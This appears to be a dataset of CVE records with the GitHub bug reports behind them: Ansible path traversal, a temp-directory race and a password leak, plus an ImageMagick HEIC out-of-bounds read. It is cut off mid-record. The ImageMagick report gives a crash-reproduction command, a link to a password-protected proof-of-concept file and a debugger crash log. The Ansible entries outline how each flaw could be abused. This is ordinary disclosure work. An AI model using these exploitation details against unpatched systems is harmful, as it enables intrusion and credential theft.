{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 6, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1737" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67795" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1737" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67795" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202006-11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "D55D4795-99E8-4097-B704-1CC2BAD67148", "versionEndExcluding": "2.7.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "4AFE2A90-1844-4D9D-80B3-E60048D81695", "versionEndExcluding": "2.8.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "1561F609-E275-430B-B472-1B84F330FCA7", "versionEndExcluding": "2.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F5C0F920-A505-452D-AFAA-AE6C20FB25EF", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/ansible/ansible/issues/67795
[ "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
<!--- Verify first that your issue is not already reported on GitHub --> <!--- Also test if the latest release and devel branch are affected too --> <!--- Complete *all* sections as described, this form is processed automatically --> ##### SUMMARY CVE-2020-1737 <!--- Explain the problem briefly below --> A specially crafted zip archive could result in path traversal in the `win_unzip` module. The `Extract-Zip` function doesn't check if the extracted path belongs to the destination folder. A possible solution is to [check destination path](https://docs.microsoft.com/en-us/dotnet/api/system.io.compression.ziparchive?view=netframework-4.8). ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/modules/windows/win_unzip.ps1` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
win_unzip path traversal with specially crafted archive
https://api.github.com/repos/ansible/ansible/issues/67795/comments
2
2020-02-26T19:55:42Z
2020-03-27T17:41:28Z
https://github.com/ansible/ansible/issues/67795
571,620,016
67,795
1,106
CVE-2020-10251
2020-03-10T04:15:11.533
In ImageMagick 7.0.9, an out-of-bounds read vulnerability exists within the ReadHEICImageByID function in coders\heic.c. It can be triggered via an image with a width or height value that exceeds the actual size of the image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1859" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1859" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "5A044015-839F-4D63-A002-1F7806C41365", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1859
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description An out-of-bounds read vulnerability exists within the "ReadHEICImageByID()" function (ImageMagick\coders\heic.c) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image. ### Steps to Reproduce (poc archive password= girlelecta): https://drive.google.com/file/d/1N5gcCo7C9yhBGgnBM4AMMngwq95x3uXn/view cmd: magick.exe convert poc.heic new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.17763.132 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\Program Files\ImageMagick-7.0.9-Q16\magick.exe convert C:\Users\test\Desktop\poc.heic c:\a.png ************* Path validation summary ************** Response Time (ms) Location Executable search path is: ModLoad: 000f0000 000fb000 image000f0000 ModLoad: 77e00000 77f99000 ntdll.dll ModLoad: 60ee0000 60f43000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0xD04: page heap enabled with flags 0x3. ModLoad: 77440000 774d8000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 756f0000 758ea000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 7b680000 7b76e000 C:\Program Files\ImageMagick-7.0.9-Q16\MSVCR120.dll ModLoad: 797c0000 7994b000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickCore_.dll ModLoad: 7b5b0000 7b679000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickWand_.dll ModLoad: 6b620000 6b63d000 C:\Program Files\ImageMagick-7.0.9-Q16\VCOMP120.DLL ModLoad: 764c0000 76638000 C:\WINDOWS\System32\USER32.dll ModLoad: 75bd0000 75bec000 C:\WINDOWS\System32\win32u.dll ModLoad: 77210000 77231000 C:\WINDOWS\System32\GDI32.dll ModLoad: 75bf0000 75d4d000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 76320000 7639c000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 75ab0000 75bcf000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 77d80000 77df9000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 774e0000 7759f000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 766a0000 76716000 C:\WINDOWS\System32\sechost.dll ModLoad: 76e10000 76ed1000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 77620000 7767e000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 602c0000 60342000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_freetype_.dll ModLoad: 68750000 68761000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_bzlib_.dll ModLoad: 67a50000 67a94000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_lcms_.dll ModLoad: 63f90000 63fe3000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libxml_.dll ModLoad: 70ca0000 70caf000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_lqr_.dll ModLoad: 68410000 68425000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_zlib_.dll ModLoad: 01530000 01545000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_zlib_.dll ModLoad: 7c720000 7c90a000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_glib_.dll ModLoad: 77800000 77d7a000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 759c0000 759fb000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 76d80000 76e04000 C:\WINDOWS\System32\shcore.dll ModLoad: 76ee0000 77156000 C:\WINDOWS\System32\combase.dll ModLoad: 758f0000 7594f000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 75d50000 76315000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 756d0000 756e7000 C:\WINDOWS\System32\profapi.dll ModLoad: 75680000 756c3000 C:\WINDOWS\System32\powrprof.dll ModLoad: 75650000 7565d000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 773f0000 77434000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 75660000 7566f000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 759a0000 759b3000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 77240000 77337000 C:\WINDOWS\System32\ole32.dll ModLoad: 74d40000 74d72000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 74d80000 74e11000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 767b0000 767b7000 C:\WINDOWS\System32\NSI.dll ModLoad: 76780000 767a6000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 70b50000 70b57000 C:\Program Files\ImageMagick-7.0.9-Q16\modules\coders\IM_MOD_RL_HEIC_.dll ModLoad: 60220000 60273000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libheif_.dll ModLoad: 51f90000 52001000 C:\Program Files\ImageMagick-7.0.9-Q16\MSVCP120.dll ModLoad: 5b7e0000 5b840000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libde265_.dll (d04.1660): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\modules\coders\IM_MOD_RL_HEIC_.dll - eax=058341f0 ebx=00000356 ecx=0010ae10 edx=0000c0c0 esi=04a86c20 edi=00000010 eip=70b5199d esp=001f6390 ebp=076e2220 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 IM_MOD_RL_HEIC_+0x199d: 70b5199d 0fb60c01 movzx ecx,byte ptr [ecx+eax] ds:0023:0593f000=?? 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 00 001f63dc 70b514e1 IM_MOD_RL_HEIC_+0x199d *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickCore_.dll - 01 001f6430 797f7b05 IM_MOD_RL_HEIC_+0x14e1 02 001f644c 7985935f CORE_RL_MagickCore_!ReadImage+0x505 03 001f6454 798dbfa2 CORE_RL_MagickCore_!RelinquishMagickMemory+0xf 04 001f646c 798dc3be CORE_RL_MagickCore_!GetPathAttributes+0x52 05 001f64b8 798d530e CORE_RL_MagickCore_!IsPathAccessible+0x4e 06 001f64c8 798db98d CORE_RL_MagickCore_!GlobExpression+0x88e 07 001f64cc 798dbaa4 CORE_RL_MagickCore_!ExpandFilenames+0x22d 08 001f64dc 798dbb43 CORE_RL_MagickCore_!ExpandFilenames+0x344 09 001f6524 77e4207b CORE_RL_MagickCore_!ExpandFilenames+0x3e3 0a 001f65c0 77e41976 ntdll!RtlpAllocateHeapInternal+0x6db *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\MSVCR120.dll - 0b 001f65e0 7b68ed63 ntdll!RtlAllocateHeap+0x36 0c 00000000 00000000 MSVCR120!malloc+0x33 ### System Configuration - ImageMagick: Version: ImageMagick-7.0.9-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
ImageMagick "ReadHEICImageByID()" Out-of-bounds read vulnerability
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1859/comments
6
2020-03-03T19:01:32Z
2020-06-17T12:24:04Z
https://github.com/ImageMagick/ImageMagick/issues/1859
574,875,269
1,859
1,107
CVE-2020-1733
2020-03-11T19:15:13.030
A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with "umask 77 && mkdir -p <dir>"; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc/<pid>/cmdline'.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.7, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 1.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 3.7, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1733" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67791" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1733" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "89338CDC-A956-4F24-A2A2-EA5CFD78F235", "versionEndExcluding": null, "versionEndIncluding": "2.7.16", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "11CEC9EC-8999-4E40-92CA-AA68D623129D", "versionEndExcluding": "2.8.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "FA56E1B5-A742-4D2E-BF0B-C806689A3E05", "versionEndExcluding": null, "versionEndIncluding": "2.9.5", "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "64DD1400-5512-493E-85DB-B3C18FBB2DBB", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.3.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/ansible/ansible/issues/67791
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
##### SUMMARY <!--- Explain the problem briefly below --> CVE-2020-1733 We create a temporary directory for the `become_user` with `umask 077` in `/var/tmp` without first checking if the directory exists and that it has the expected permissions. **Relevant code** https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/plugins/shell/__init__.py#L159-L163 We need to validate the parent directories are as expected before creating directories in those paths and fail if the permissions and/or ACLs are not what we expect. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/plugins/shell/__init__.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
Insecure creation of temporary directory for become_user
https://api.github.com/repos/ansible/ansible/issues/67791/comments
5
2020-02-26T19:46:31Z
2020-05-11T13:00:03Z
https://github.com/ansible/ansible/issues/67791
571,615,146
67,791
1,108
CVE-2020-1739
2020-03-12T18:15:12.337
A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "password" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 2.5, "source": 